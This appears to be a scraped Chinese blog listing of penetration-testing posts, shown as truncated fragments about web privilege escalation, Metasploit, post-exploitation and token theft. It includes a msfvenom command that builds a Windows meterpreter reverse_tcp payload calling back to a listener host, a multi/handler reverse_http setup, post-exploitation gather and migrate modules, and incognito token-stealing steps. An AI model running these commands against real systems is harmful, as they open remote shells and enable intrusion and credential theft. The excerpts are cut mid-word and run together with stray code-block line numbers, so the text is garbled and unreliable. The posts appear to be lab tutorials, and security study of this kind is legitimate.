web提权1234567891011121314151617181920212223242526272829303132333435363738394041424344451.能不能执行cmd就看这个命令：net user，net不行就用n

METASPLOITexploit-db •Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework，简称叫做MSF。Metasploit作为全球最受欢迎的工具，不仅仅是因为它的方便性和强大性，更重

1234567root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.44.128 LPORT=4444 -f exe > shell.ex

后渗透模块post后渗透模块 1234567891011121314151617181920run post/windows/manage/migrate #自动进程迁移run post/windows/gather/c

map 192.168.44.133 –script vuln 令牌窃取提权123456meterpreter > load incognito //加载incognitometerpreter > getuid //查看当前t

cs传shell给msf1.msf 1234use exploit/multi/handlerset payload windows/meterpreter/reverse_httpset lhost 192.168.110.130

centos安装msf下载包 1wget https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run 权限配置 1chm

command收集渗透中会用到的常用命令 command nmap 存活主机 bypass gobuster dirsearch nbtscan 代理工具 ssh grep mysql sqlmap hydra medusa pyth